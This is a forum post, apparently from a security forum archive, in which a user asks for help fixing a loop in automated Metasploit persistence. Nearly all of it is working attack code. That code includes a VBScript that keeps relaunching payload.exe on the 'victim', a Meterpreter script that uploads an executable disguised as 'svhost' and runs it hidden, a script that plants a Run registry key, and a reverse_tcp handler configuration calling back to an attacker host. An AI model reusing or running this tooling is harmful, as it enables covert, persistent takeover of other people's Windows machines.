PDA

View Full Version : Metasploit automation issue on persistant



scorpoin
2013-07-09, 04:13
Greetings ,


I'm working on to automate persistent , so far I've found a nice script from darkraptor thanks to him for such a nice effort . Every thing is working fine the only issue is , persistent stuck in kind of loop . Means when a connect back hit , my persistence post attack again retry to upload files on victim so it's stuck and keep uploading. Im posting scripts.


custom Vbs for persistence ,which I placed them on my /root path for uploading payload.exe n vbs file to victim.



state = 1
While state = 1
Set WshShell = WScript.CreateObject ("WScript.Shell")
Set colProcessList = GetObject("Winmgmts:").ExecQuery ("Select * from Win32_Process")
For Each objProcess in colProcessList
if objProcess.name = "payload.exe" then
vFound = True
End if
Next
If vFound = True then
wscript.sleep 5000
Else
WshShell.Run ("C:\WINDOWS\temp\payload.exe")
wscript.sleep 5000
End If
vFound = False
Wend




Path where I placed my custom scripts which I've used:

Metasploit/apps/pro/msf3/scripts/meterpreter

This is upload.rc


# $Id$
# $Revision$

session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-e" => [ true, "Executable or script to upload to target host." ],
"-o" => [ true, "Options for executable." ],
"-p" => [ false,"Path on target to upload executable, default is %TEMP%." ],
"-v" => [ false,"Verbose, return output of execution of uploaded executable." ],
"-r" => [ false,"Remove the executable after running it (only works if the executable exits right away)" ]
)

################## function declaration Declarations ##################
def usage()
print_line "UploadExec -- upload a script or executable and run it"
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end

def upload(session,file,trgloc = "")
if not ::File.exists?(file)
raise "File to Upload does not exists!"
else
if trgloc == ""
location = session.fs.file.expand_path("%TEMP%")
else
location = trgloc
end
begin
ext = file[file.rindex(".") .. -1]
if ext and ext.downcase == ".exe"
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
else
fileontrgt = "#{location}\\TMP#{rand(100)}#{ext}"
end
print_status("\tUploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")
print_status("\t#{file} uploaded!")
print_status("\tUploaded as #{fileontrgt}")
rescue ::Exception => e
print_status("Error uploading file #{file}: #{e.class} #{e}")
raise e
end
end
return fileontrgt
end

#Function for executing a list of commands
def cmd_on_trgt_exec(session,cmdexe,opt,verbose)
r=''
session.response_timeout=120
if verbose == 1
begin
print_status "\tRunning command #{cmdexe}"
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("\t#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
raise e
end
else
begin
print_status "\trunning command #{cmdexe}"
r = session.sys.process.execute(cmdexe, opt, {'Hidden' => true, 'Channelized' => false})
r.close
rescue ::Exception => e
print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
raise e
end
end
end

def m_unlink(session, path)
r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
while(r.name)
select(nil, nil, nil, 0.10)
end
r.close
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
unsupported if client.platform !~ /win32|win64/i
#parsing of Options
file = ""
cmdopt = nil
helpcall = 0
path = ""
verbose = 0
remove = 0
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
file = val || ""
when "-o"
cmdopt = val
when "-p"
path = val
when "-v"
verbose = 1
when "-h"
helpcall = 1
when "-r"
remove = 1
end

}

if args.length == 0 || helpcall == 1
usage
end
print_status("Running Upload and Execute Meterpreter script....")
exec = upload(session,file,path)
cmd_on_trgt_exec(session,exec,cmdopt,verbose)
if remove == 1
print_status("\tDeleting #{exec}")
m_unlink(session, exec)
end
print_status("Finished!")



Used Smartmigrate.rb


Auto.rb this is customize autopersistence



# The first sleep below is not necessary, but makes the output cleaner
#
sleep(1)
#
print_status("Waiting on an incoming sessions...")
while (true)
framework.sessions.each_pair do |sid,s|
thost = s.tunnel_peer.split(":")[0]
#
# Ensure that stdapi has been loaded before running
if s.ext.aliases['stdapi']
sleep(1)
print_status("Uploading files to session #{sid} #{thost}...")
s.console.run_single("upload payload.exe Wupd.vbs C:\\\\\WINDOWS\\\\\Temp")
print_status("Executing persistent script...")
s.console.run_single("execute -H -f 'cmd.exe /c cscript C:\\\\\WINDOWS\\\\\Temp\\\\\Wupd.vbs'")
print_status("Creating Registry Key...")
s.console.run_single("reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\curren tversion\\\\run -v msfpersist -d 'C:\\\WINDOWS\\\Temp\\\Wupd.vbs'")
s.console.run_single("reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\curren tversion\\\\Run -v msfpersist")
###print_status("Closing session #{sid} #{thost}...")
###s.kill
###else
print_status("Session #{sid} #{thost} active, but not yet configured")
end
#
end
sleep(1)
end
#
print_status("All done")



Finally my auto payload and modules

mysetup.rc



use exploit/multi/handler
set lhost 192.168.1.3
set lport 8443
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set AutoRunScript multiscript.rb -rc /opt/metasploit/apps/pro/msf3/met_script.lst
exploit -j


Met_script.lst



smart_migrate
auto



My finaly on startup command



/opt/metasploit/apps/pro/msf3/msfconsole -r /opt/metasploit/apps/pro/msf3/mysetup.rc



Hope some one can help me out to avoid that looping. Looking forward for your kind response.


Regards
Scorpoin